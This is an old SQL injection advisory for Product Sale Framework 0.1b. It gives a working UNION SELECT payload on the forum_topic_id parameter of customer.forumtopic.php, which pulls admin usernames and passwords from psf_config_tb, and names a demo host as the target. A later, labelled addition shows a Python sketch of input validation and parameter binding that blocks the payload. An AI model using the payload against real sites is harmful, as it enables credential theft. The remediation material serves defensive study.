
# Title : Product Sale Framework 0.1b (forum_topic_id) SQL Injection Vulnerability
# Published : 2008-12-07
# Author : b3hz4d


        +++++++++++++++++++++++In The Name Of Allah+++++++++++++++++++++++++++
        +                                                                    +
        +         Product Sale Framework sql injection Vulnerability         +
        +                                                                    +
        +                      Discovered by b3hz4d                          +
        +                                                                    +
        +                      WwW.DeltaHacking.Net                          +
        +                                                                    +
        +                                                                    +
        +                                                                    +
        ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
                                  

                              APA Center of Yazd University   
                                 (https://www.ircert.cc)    

		
AUTHOR : b3hz4d (Seyed Behzad Shaghasemi)
DATE   : 06 Dec 2008
SITE   : WwW.DeltaHacking.Net
CONTACT: behzad_sh_66@yahoo.com

#####################################################

APPLICATION   : Product Sale Framework v0.1 beta
DOWNLOAD(free): http://www.productsaleframework.com/downloads/psf.zip
VENDOR        : http://www.productsaleframework.com
DEMO (links)  : http://www.productsaleframework.com

#####################################################


[+] vuln    : 
              customer.forumtopic.php
              
              The vulnerability is in the forum. All demo links (Admin demo, Affiliate demo, Customer demo) are here:
             
              http://www.productsaleframework.com/

[+] Exploit : 
              Admin Username and Password:

              http://www.kalptarudemos.com/demo/psf/customer/customer.forumtopic.php?forum_topic_id=-1 union select concat(username,0x3a,password),2,3,4,5,6 from psf_config_tb
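
[+] Fix (added example, not part of the original advisory and not the vendor's code):
              The sketch below shows the two controls that close this class of bug for forum_topic_id: strict integer validation and a bound query parameter. The table psf_forum_topic_tb, its six columns and the sample rows are assumptions made for the demo; only psf_config_tb and the parameter value come from the advisory.

```python
import sqlite3

# Assumed schema: apart from psf_config_tb the advisory shows no tables.
# psf_forum_topic_tb and its six columns are hypothetical (six matches the
# column count of the advisory's UNION). All rows are constructed.
def build_demo_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE psf_forum_topic_tb (
            forum_topic_id INTEGER PRIMARY KEY, title TEXT, body TEXT,
            author TEXT, created TEXT, replies INTEGER);
        CREATE TABLE psf_config_tb (username TEXT, password TEXT);
        INSERT INTO psf_forum_topic_tb VALUES
            (1, 'Welcome', 'First topic', 'staff', '2008-12-01', 0);
        INSERT INTO psf_config_tb VALUES ('admin', 'constructed-secret');
    """)
    return db

TOPIC_SQL = ("SELECT forum_topic_id, title, body, author, created, replies "
             "FROM psf_forum_topic_tb WHERE forum_topic_id = ?")

def parse_topic_id(raw):
    """Accept only a plain positive ASCII decimal integer, else None."""
    if isinstance(raw, str) and raw.isascii() and raw.isdigit() and len(raw) <= 10:
        value = int(raw)
        return value if value > 0 else None
    return None

def get_topic(db, raw_id):
    """Hardened lookup: validate first, then bind the value as a parameter."""
    topic_id = parse_topic_id(raw_id)
    if topic_id is None:
        return None  # caller answers 400/404 and never builds a query
    return db.execute(TOPIC_SQL, (topic_id,)).fetchone()

def get_topic_bound_only(db, raw_id):
    """Binding alone, no validation: the input is compared as data, never parsed as SQL."""
    return db.execute(TOPIC_SQL, (raw_id,)).fetchall()

# Value of forum_topic_id as it appears in the advisory's URL.
ADVISORY_VALUE = ("-1 union select concat(username,0x3a,password),"
                  "2,3,4,5,6 from psf_config_tb")

if __name__ == "__main__":
    db = build_demo_db()
    print(get_topic(db, "1"))                        # the legitimate topic row
    print(get_topic(db, ADVISORY_VALUE))             # rejected before any query
    print(get_topic_bound_only(db, ADVISORY_VALUE))  # no rows, no config data
```

              Validation rejects the request early and gives a clean signal to log; parameter binding is the control that actually prevents the injected UNION from being interpreted.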
    
               
##########################################################################################################

# Greetings: str0ke, Dr.Trojan, Cru3l.b0y, l0pht and all member in DeltaHacking.Net & Snoop-Security.Com #

##########################################################################################################
